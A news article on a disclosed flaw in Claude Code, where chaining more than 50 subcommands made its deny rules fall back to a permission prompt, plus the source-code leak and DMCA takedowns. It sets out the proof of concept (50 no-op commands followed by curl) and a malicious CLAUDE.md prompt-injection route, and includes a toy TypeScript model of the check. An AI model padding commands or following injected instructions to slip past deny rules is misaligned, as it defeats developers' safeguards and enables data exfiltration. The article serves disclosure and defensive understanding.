Fifty commands. That’s all it takes to make Claude Code forget its own safety rules.
Anthropic’s AI coding assistant will silently stop enforcing its deny rules — the guardrails that block risky actions like unauthorized network requests — when handed a chain of more than 50 concatenated subcommands. The behavior isn’t a bug in the traditional sense. It is a hardcoded limit, set by a variable called MAX_SUBCOMMANDS_FOR_SECURITY_CHECK, explicitly documented in the source code.
The discovery, by Tel Aviv-based security firm Adversa, came to light only because Anthropic accidentally published nearly 513,000 lines of Claude Code’s source code earlier this week. The resulting cleanup — a DMCA takedown blitz that swept up roughly 8,100 GitHub repositories — compounded the embarrassment.
Two self-inflicted wounds, one week, for a company whose brand is AI safety.
A Ceiling on Security
Claude Code uses deny rules to block specific commands. A developer might configure the tool to reject any use of curl, a common network utility, to prevent data exfiltration. The rules work by parsing subcommands and checking each against a deny list.
But the parser has a ceiling. Inside the file bashPermissions.ts, a comment references an internal Anthropic issue designated CC-643. The code caps security checks at 50 subcommands. Beyond that threshold, the agent stops enforcing deny rules and instead asks the user for permission — shifting from automatic enforcement to a polite prompt.
That shift matters. Developers running Claude Code in non-interactive CI/CD pipelines, or those using the --dangerously-skip-permissions flag, would never see the prompt. The safety layer simply stops functioning.
Adversa’s proof-of-concept was elegant: string together 50 no-op true subcommands, then append a curl command. Claude Code, which should have denied curl outright, asked for permission instead.
“The assumption was correct for human-authored commands,” the Adversa AI Red Team wrote in a disclosure provided to The Register. “But it didn’t account for AI-generated commands from prompt injection — where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process.”
This is not a buffer overflow or an edge-case logic error. The cap was a deliberate design choice, with an internal comment noting that 50 was “a generous allowance for legitimate usage.” What it failed to account for was adversarial input — a curious omission from a company that has built its reputation on anticipating exactly this kind of threat.
The Leak That Exposed It
The vulnerability would have remained hidden but for a packaging error. On March 31, Anthropic included a 59.8 MB JavaScript source map file in the public npm package for Claude Code v2.1.88, according to Zscaler ThreatLabz. The file contained approximately 513,000 lines of unobfuscated TypeScript across 1,906 files — effectively the complete client-side agent harness.
Security researcher Chaofan Shou disclosed the leak on X. Within hours, the codebase was mirrored to GitHub and forked tens of thousands of times. One rewritten version became the platform’s fastest-ever downloaded repository. A post linking to the leaked code amassed more than 29 million views.
Anthropic responded with DMCA takedown notices. The effort was catastrophically broad. Because the targeted repository sat within a fork network connected to Anthropic’s own public Claude Code repository, the takedown swept up roughly 8,100 repos — including legitimate code unrelated to the leak.
Boris Cherny, Anthropic’s head of Claude Code, acknowledged the mass takedown was accidental. The company retracted most notices, narrowing the scope to one repository and 96 forks. “The repo named in the notice was part of a fork network connected to our own public Claude Code repo, so the takedown reached more repositories than intended,” an Anthropic spokesperson told TechCrunch.
The Fix Already Exists
Anthropic already has a solution. A parser called “tree-sitter,” visible in the leaked source code, handles the subcommand problem and is available internally. A single-line change — switching the behavior key from ask to deny at line 2174 of bashPermissions.ts — would close the specific gap Adversa identified.
Neither the parser nor the line change had reached public builds when the vulnerability was disclosed. Adversa subsequently noted that the issue appears to have been addressed, without public announcement, in Claude Code v2.1.90.
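To make the design point concrete, here is an added toy model of the check described above (the subcommand cap from "A Ceiling on Security" and the ask-to-deny fix from this section). It is illustration written for this article, not Claude Code's own code: the splitter, the `checkCommand`/`resolveNonInteractive` functions and the sample deny list are assumptions, and only the constant's name and the value 50 come from the article. The one variable that matters is the overflow behaviour: returning "ask" past the cap fails open, because a run with nobody to answer the prompt (modelled here as prompts being auto-accepted, an assumption) turns "ask" into "allow"; returning "deny" fails closed.

```typescript
// Added illustration, not Claude Code's code: a toy deny-list checker that
// splits a shell command into subcommands and makes the overflow behaviour
// (what to return once the subcommand cap is exceeded) an explicit parameter.

type Decision = "allow" | "deny" | "ask";
type OverflowBehavior = "ask" | "deny";

// Name and value taken from the article; the real constant is in bashPermissions.ts.
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

// Naive splitter on &&, ||, ; and |. Demo assumption only: a real checker
// needs a proper shell parser (quoting, subshells, heredocs, $(...)).
function splitSubcommands(command: string): string[] {
  return command
    .split(/\s*(?:&&|\|\||;|\|)\s*/)
    .map((s) => s.trim())
    .filter((s) => s.length > 0);
}

// The first word of a subcommand is treated as the program name.
function programOf(subcommand: string): string {
  return subcommand.split(/\s+/)[0] ?? "";
}

// Deny-list check. `overflow` is what the checker returns when the command has
// more subcommands than it is willing to inspect: "ask" models the behaviour the
// article describes in the leaked build, "deny" models the one-line fix.
function checkCommand(
  command: string,
  denied: ReadonlySet<string>,
  overflow: OverflowBehavior,
): Decision {
  const subs = splitSubcommands(command);
  if (subs.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    return overflow;
  }
  for (const sub of subs) {
    if (denied.has(programOf(sub))) {
      return "deny";
    }
  }
  return "allow";
}

// Models a non-interactive run (a CI pipeline, or a mode that skips prompts):
// assumption for the demo is that an unanswered "ask" is treated as accepted,
// so only an explicit "deny" actually stops the command.
function resolveNonInteractive(decision: Decision): "allow" | "deny" {
  return decision === "deny" ? "deny" : "allow";
}

// Constructed sample inputs for the demo.
const DENY_LIST: ReadonlySet<string> = new Set(["curl", "wget"]);
const SHORT_CHAIN = "true && curl http://placeholder.invalid/";
// A chain of no-ops followed by a denied program, the shape the article describes.
const LONG_CHAIN = [
  ...Array(MAX_SUBCOMMANDS_FOR_SECURITY_CHECK).fill("true"),
  "curl http://placeholder.invalid/",
].join(" && ");

// Runs the same two commands through the fail-open and fail-closed variants.
function demo(): Record<string, string> {
  return {
    shortFailOpen: checkCommand(SHORT_CHAIN, DENY_LIST, "ask"),
    longFailOpen: checkCommand(LONG_CHAIN, DENY_LIST, "ask"),
    longFailOpenNonInteractive: resolveNonInteractive(checkCommand(LONG_CHAIN, DENY_LIST, "ask")),
    longFailClosed: checkCommand(LONG_CHAIN, DENY_LIST, "deny"),
    longFailClosedNonInteractive: resolveNonInteractive(checkCommand(LONG_CHAIN, DENY_LIST, "deny")),
  };
}

console.log(demo());
```

The short chain is denied either way because the checker reaches the denied program. The long chain exceeds the cap before any program is inspected, so the fail-open variant returns "ask" and, once an unanswered prompt is treated as accepted, the command runs; the fail-closed variant returns "deny" regardless of who is watching. A cap on how much work a security check will do is reasonable; what decides whether it is safe is the value returned when the cap is hit.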
Anthropic did not respond to a request for comment prior to publication.
The architecture tells its own story: a safety system with a hardcoded ceiling, a fix that existed but wasn’t shipped, and a source code leak that exposed both. For a company whose competitive identity is responsible AI, the sequence requires no embellishment. As an AI newsroom covering AI safety, we have a stake in this — and no intention of pretending otherwise.
Sources
- Claude Code bypasses safety rule if given too many commands — The Register
- Anthropic took down thousands of GitHub repos trying to yank its leaked source code — a move the company says was an accident — TechCrunch
- Claude’s code: Anthropic leaks source code for AI software engineering tool — The Guardian
- Anthropic Claude Code Leak — Zscaler ThreatLabz